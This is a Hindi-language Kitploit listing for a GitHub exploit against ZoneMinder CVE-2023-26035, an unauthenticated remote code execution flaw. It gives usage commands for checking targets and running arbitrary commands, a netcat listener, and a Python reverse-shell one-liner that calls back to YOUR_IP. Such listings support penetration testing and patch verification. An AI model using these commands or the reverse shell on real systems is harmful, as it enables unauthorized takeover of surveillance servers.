Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
zoneminder_CVE-2023-26035 — CVE-2023-26035 के लिए शोषण जो ZoneMinder < 1.36.33 और < 1.37.33 को प्रभावित करता है | Kitploit
उपकरण/GitHubGitHub/0xfalafel/zoneminder_cve-2023-26035
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHub0xfalafel/zoneminder_cve-2023-26035

zoneminder_CVE-2023-26035

CVE-2023-26035 के लिए शोषण जो ZoneMinder < 1.36.33 और < 1.37.33 को प्रभावित करता है

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण - ZoneMinder CVE-2023-26035

यह ZoneMinder स्नैपशॉट्स को प्रभावित करने वाला एक अप्रमाणित दूरस्थ कोड निष्पादन (RCE) है।
यह CVE-2023-26035 के लिए एक शोषण है।

प्रभावित संस्करण

ZoneMinder < 1.36.33 और
ZoneMinder < 1.37.33।

शोषण का उपयोग

उपयोग

जाँचें कि लक्ष्य असुरक्षित है या नहीं:

root@kitploit:~
python3 zoneminder.py http://target

एक कमांड निष्पादित करें

root@kitploit:~
python3 zoneminder.py http://target command

उदाहरण

ping के साथ कमांड निष्पादन का परीक्षण करें

लक्ष्य से जुड़े इंटरफ़ेस (यहाँ tun0) पर tcpdump चलाएं और ICMP पैकेट के लिए फ़िल्टर करें:

root@kitploit:~
sudo tcpdump -i tun0 icmp

फिर अपने IP पर ping निष्पादित करें। उद्धरण चिह्न " का उपयोग करना सुनिश्चित करें, अन्यथा कमांड सही ढंग से व्याख्या नहीं की जाएगी।

root@kitploit:~
python3 zoneminder.py http://target "ping -C 4 your_ip"

रिवर्स शेल

netcat के साथ लिसनर बनाएँ:

root@kitploit:~
nc -lvnp 1337

एक रिवर्स शेल वन-लाइनर का उपयोग करें:

root@kitploit:~
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

और अधिक जानकारी https://revshells.com पर।

आवश्यकताएँ

शोषण requests और BeautifulSoup का उपयोग करता है। इसे इसके साथ स्थापित करें:

root@kitploit:~
python3 -m pip install requests beautifulsoup4

आभार

मैं बस एक स्वतंत्र शोषण चाहता था जिसमें Metasploit की आवश्यकता नहीं थी।
यह स्क्रिप्ट https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb से ली गई है।

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr

टूल डाउनलोड करें